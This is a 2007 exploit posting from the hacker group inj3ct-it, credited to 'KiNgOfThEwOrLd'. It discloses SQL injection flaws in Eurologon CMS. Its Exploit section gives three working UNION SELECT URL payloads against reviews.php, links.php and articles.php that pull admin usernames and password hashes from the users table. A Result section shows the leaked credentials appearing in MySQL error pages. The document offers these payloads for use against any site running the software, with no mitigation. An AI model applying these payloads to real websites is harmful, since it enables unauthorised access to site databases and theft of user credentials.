1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 ____ __________ __ ____ __
3 /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
4 | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
5 | | | \ | |/ \ \___| | /_____/ | || |
6 |___|___| /\__| /______ /\___ >__| |___||__|
7 \/\______| \/ \/
8 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9
10 Http://www.inj3ct−it.org
Staff[at]inj3ct−it[dot]org
11
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13
14 Eurologon CMS reviews.php/links.php/articles.php SQL Injection
15
16 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
17
18 #By KiNgOfThEwOrLd
19
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 PoC
22
23 Useless..
24 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
25 Exploit
26
27 http://[target]/reviews.php?id=’+union+select+1,concat(username,0x3a,password)
28 +from+users/*
29 http://[target]/links.php?id=’+union+select+1,concat(username,0x3a,password)
30 +from+users/*
31 http://[target]/articles.php?id=’+union+select+1,concat(username,0x3a,password)
32 +from+users/*
33 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
34 Result
35
36 You will see the disclosed informations under some mysql errors like:
37
38 Can’t execute query
39
40 [QUERY]
41
42
43 MySQL Error: The used SELECT statements have a different number of columns
44 Can’t execute query
45
46 [QUERY]
47
48 MySQL Error: The used SELECT statements have a different number of columns
49 Can’t execute query
50
51 [QUERY]
52
Page 1/2
Eurologon CMS Multiple Remote SQL Injection Vulnerabilities
KiNgOfThEwOrLd
11/27/2007
53 MySQL Error: The used SELECT statements have a different number of columns
54
55 Home > [category_name] > [category_name] > [admin_name]:[admin_hash]
56 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
57
58 # m